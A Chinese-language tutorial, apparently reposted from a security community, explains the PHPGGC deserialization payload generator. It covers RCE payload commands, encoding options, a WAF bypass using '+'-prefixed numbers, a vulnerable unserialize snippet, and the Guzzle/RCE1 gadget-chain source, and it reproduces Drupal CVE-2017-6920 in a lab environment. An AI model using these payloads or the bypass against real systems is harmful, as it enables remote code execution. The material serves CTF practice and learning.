从0到1掌握反序列化工具之PHPGGC

背景：

  PHPGGC是一款能够自动生成主流框架的序列化测试payload的工具,可以说是反序列化的武器库,平时遇到有关反序列化的题目时如果能够熟练运用它，将节省大量功夫，之前只知道有这个工具但是并没有好好研究研究它，于是便有了此文，若是哪里说的不对，还请师傅们指出。

1.PHPGGC工具介绍：

  项目地址：https://github.com/ambionics/phpggc
    运行phpggc 的条件是php cli的版本>=5.6
    通过./phpggc -l 可以列出所有可利用的组件，其中每条都包括组件的名称、版本范围、可利用其进行的操作(文件读写或RCE)、攻击向量(例如__destruct)

 通过./phpggc 组件名 -i 可以显示与组建相关的信息，其中就包括了具体生成攻击payload所需要的参数

  以上图为例，生成laravel/rce1的payload需要提供函数名以及传给该函数的参数
    因此使用：./phpggc Laravel/RCE1 system id 即可生成payload

    对于只能满足写文件需求的组件例如，要利用必须知道网站的绝对路径，例如目标网站绝对路径为/var/www/html，需要写入shell.php ，写入的文件位于我们本机的/tmp/data，则需要执行：

  PHPGGC中的-w参数还可以对序列化的数据进行一个再次包装处理：
    a.在形成序列化数据之前调用其来更改序列化的对象,若存在以下漏洞点，接收参数为一个二维数组，那么我们需要对其中message键对应的值进行反序列化：

<?php
$data = unserialize($_GET['data']);
print $data['message'];

此时可以自己利用PHPGGC提供的process_object($object)，即data对应的值不是一个序列化的字符串，而data['message']的值才应该是一个序列化后的字符串，这里只需要将要序列化的对象的值赋给message，即可以使用：

<?php
# /tmp/w.php
function process_object($object)
{
    return array(
        'message' => $object
    );
}

里将序列化对象的值赋给了message，并且返回为一个数组，然后再对数组进行serialize()函数处理，形成序列化的数据,运行结果如下：

由上图可以看出经过再次包装处理，序列化的数据成了一个包含一个元素的数组的序列化数据，即a:1
    b.在形成序列化数据以后对序列化数据进行更改，这里举个最简单的例子，将id字符串更改为ls

由图中可以看到此时已经成功进行更改，当然稍微复杂一点的更改可以针对实际情况进行调整要更改的字符串，比如https://xz.aliyun.com/t/2912 中easy_lavarel题目最后要更改一下要删除编译后模板文件的路径。
   phpggc也支持payload编码功能，例如./phpggc -b -u -u slim/rce1 system id,对生成的序列化数据先进行base64编码，再进行两次urlencode编码
    使用-f参数进行快速反序列化，即在unserialize()函数以后立即销毁对象，而不是在php脚本运行结束以后，建议在组件的攻击向量为__destruct时进行使用。
    使用--plus-numbers可以用来bypass，如果waf检测序列化数据中是否包含php对象是通过正则O:[0-9]+来判断，则可以通过O:+123代替O:123来绕过，其中types是指要在何种数据类型的数字前加“+”,比如O就是PHP对象，i就是int类型数据。

2.PHPGGC实践

  上一个部分对PHPGGC工具的使用方法有了一个基本的了解，接下来需要利用实践环境进行一个实践操作，知道其具体应如何使用：
    环境：
    CVE-2017-6920  YAML 解析器处理不当导致的一个远程代码执行漏洞
  https://github.com/Medicean/VulApps/tree/master/d/drupal/1
    这里以Guzzle/RCE1为例子进行分析，来对drupal进行测试：

在PHPGGC中，pop链在gadgets.php文件中，pop链的逻辑和描述在chain.php文件中
    chain.php

<?php

namespace GadgetChain\Guzzle;

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public static $version = '6.0.0 <= 6.3.2';
    public static $vector = '__destruct';
    public static $author = 'proclnas';
    public static $informations = '
        This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be
        deserialized afterwards.
        See https://github.com/ambionics/phpggc/issues/34
    ';


    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \GuzzleHttp\Psr7\FnStream([
            'close' => [
                new \GuzzleHttp\HandlerStack($function, $parameter),
                'resolve'
            ]
        ]);
    }
}

 从其中可以看到其对使用该组件的描述，要求GuzzleHttp\Psr7的版本要小于1.5.0，具体的逻辑在generate成员方法中，其中入口参数为数组parameters，其包括function和parameter两个参数，分别为要进行rce的函数和函数的参数，其返回的即是\GuzzleHttp\Psr7\FnStream的匿名对象，其入口参数为一个数组，数组包括一个数组元素，键名为close，键值为一个数组，包括\GuzzleHttp\HandlerStack匿名对象，以及resolve字符串，至此构造序列化对象的逻辑结束，接下来结合gadgets.php看一下整个链是如何连起来的:
  gadgets.php:

<?phpnamespace Psr\Http\Message{
    interface StreamInterface{}}namespace GuzzleHttp\Psr7{
    class FnStream implements \Psr\Http\Message\StreamInterface
    {
        private $methods;

        public function __construct(array $methods)
        {
            $this->methods = $methods;

            foreach ($methods as $name => $fn) {
                $this->{'_fn_' . $name} = $fn;
            }
        }
        /*        public function __destruct()        {            if (isset($this->_fn_close)) {                call_user_func($this->_fn_close);            }        }        public function close()        {            return call_user_func($this->_fn_close);        }        */
    }}namespace GuzzleHttp{
    class HandlerStack
    {
        private $handler;
        private $stack;
        private $cached = false;

        function __construct($function, $parameter)
        {
            $this->stack = [[$function]];
            $this->handler = $parameter;
        }
        /*        public function resolve()        {            if (!$this->cached) {                if (!($prev = $this->handler)) {                    throw new \LogicException('No handler has been specified');                }                foreach (array_reverse($this->stack) as $fn) {                    $prev = $fn[0]($prev);                }                $this->cached = $prev;            }            return $this->cached;        }        */
    }}

 在类HandlerStack的构造方法中传入了rce要使用的函数及参数，并赋值给$this->stack和$this->handler，然后在类FnStream的构造方法中传入包含键close的数组，此时将会拼接出:
     _fn_close=[new\GuzzleHttp\HandlerStack($function, $parameter),'resolve']
 _fn_close的第一个元素其实已经实例化为一个匿名对象了，这里为了好理解先写成实例化前的形式。然后在FnStream的__destruct()函数中将会调用$this->_fn_close，即构成：
    call_user_func([new \GuzzleHttp\HandlerStack($function, $parameter),'resolve'])
  以上这种调用的形式在php官方文档中存在此种调用类中方法的形式：

  所以此时关注类HandlerStack的resolve方法,其中将利用php的动态函数的性质来构成rce的函数调用，比如此时假设：
    [new \GuzzleHttp\HandlerStack($function, $parameter),'resolve']=>
    [new \GuzzleHttp\HandlerStack("system", "id"),'resolve']
  即此时$prev参数首先经过$prev = $this->handler以后为id，接着经过foreach (array_reverse($this->stack) as $fn)，$fn将为包含一个元素的数组["system"],然后经过$fn[0]即为system，即$prev即为system("id");最后函数调用返回再传入call_user_func，即构成call_user_func(system("id")) ;
  到此，整个调用链已经分析结束，实现的原理也清楚了，接下来利用其生成的序列化payload来测试一下,因为生成的序列化数据里面含有空字节，因此将payload输出到文件中使用php的addslashes函数转义一下：

接着就可以加上在序列化数据前加上YAML_PHP_TAG，即!php/object 标签

  由上图可以看到此时已经成功执行system("id")。

参考

转自先知社区